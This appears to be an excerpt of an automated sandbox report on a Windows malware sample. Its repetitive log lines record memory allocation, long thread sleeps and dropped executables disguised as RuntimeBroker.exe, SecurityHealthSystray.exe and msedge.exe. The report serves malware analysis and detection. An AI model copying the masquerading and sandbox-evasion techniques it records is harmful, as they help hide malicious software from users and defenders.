                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: 1AF90000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeMemory allocated: 1840000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeMemory allocated: 1B3C0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeMemory allocated: 1A650000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeMemory allocated: 1B0A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeMemory allocated: 33F0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeMemory allocated: 1B3F0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: 18C0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: 1B430000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: 970000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: 1A680000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1792
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1120
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1806
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1288
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1921
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1392
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2047
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 927
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1365
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1366
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1735
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1332
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1744
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1897
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1715
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1535
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1403
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1525
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\HnmxfGsC.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\ynMPgItS.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\yEThvdnU.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\fsrbbHSF.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\WJYLrfNX.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\MaEvHCHq.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeDropped PE file which has not been started: C:\Users\user\Desktop\oWARLBim.logJump to dropped file
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe TID: 2120Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep count: 1792 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9192Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428Thread sleep count: 1120 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432Thread sleep count: 1806 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -11990383647911201s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8660Thread sleep count: 1288 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9200Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8668Thread sleep count: 1921 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376Thread sleep count: 1392 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9196Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep count: 2047 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9176Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8964Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep count: 927 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep count: 1365 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9208Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8716Thread sleep count: 1366 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8940Thread sleep time: -18446744073709540s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep count: 1735 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9164Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464Thread sleep count: 1332 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608Thread sleep time: -11068046444225724s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8636Thread sleep count: 1744 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9180Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep count: 1897 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9036Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep count: 1715 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep count: 1535 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep count: 1403 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -11990383647911201s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8664Thread sleep count: 1525 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe TID: 6844Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
